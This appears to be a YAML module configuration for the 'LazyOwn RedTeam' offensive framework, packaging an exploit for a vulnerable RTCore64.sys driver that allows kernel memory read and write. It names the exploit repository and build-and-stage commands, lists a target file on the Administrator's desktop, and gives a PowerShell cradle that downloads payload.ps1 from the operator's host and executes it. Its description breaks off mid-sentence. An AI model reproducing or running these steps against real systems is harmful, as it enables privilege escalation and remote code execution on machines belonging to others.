README.md
name: CVE-2022-22077
description: >
  The RTCore64.sys driver exposes IOCTLs that allow any user (even a low-privileged one) to arbitrarily read and write physical and kernel memory, which allows:
author: "LazyOwn RedTeam"
version: "1.0"
enabled: true
params:
  - name: lhost
    type: string
    required: true
    description: lhost target.
tool:
  name: CVE-2022-22077
  repo_url: https://github.com/grisuno/CVE-2022-22077.git
  install_path: external/.exploit/CVE-2022-22077
  install_command: ./install.sh
  execute_command: git restore . ; git pull ; chmod +x *.sh && ./build.sh && cp payload.ps1 ../../../sessions/payload.ps1 && cp exploit.exe ../../../sessions/exploit.exe && cp RTCore64.sys ../../../sessions/RTCore64.sys
download_file: C:\Users\Administrator\Desktop\root.txt
lazycommand: >-
  encodewinbase64 powershell -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://{lhost}/payload.ps1\")'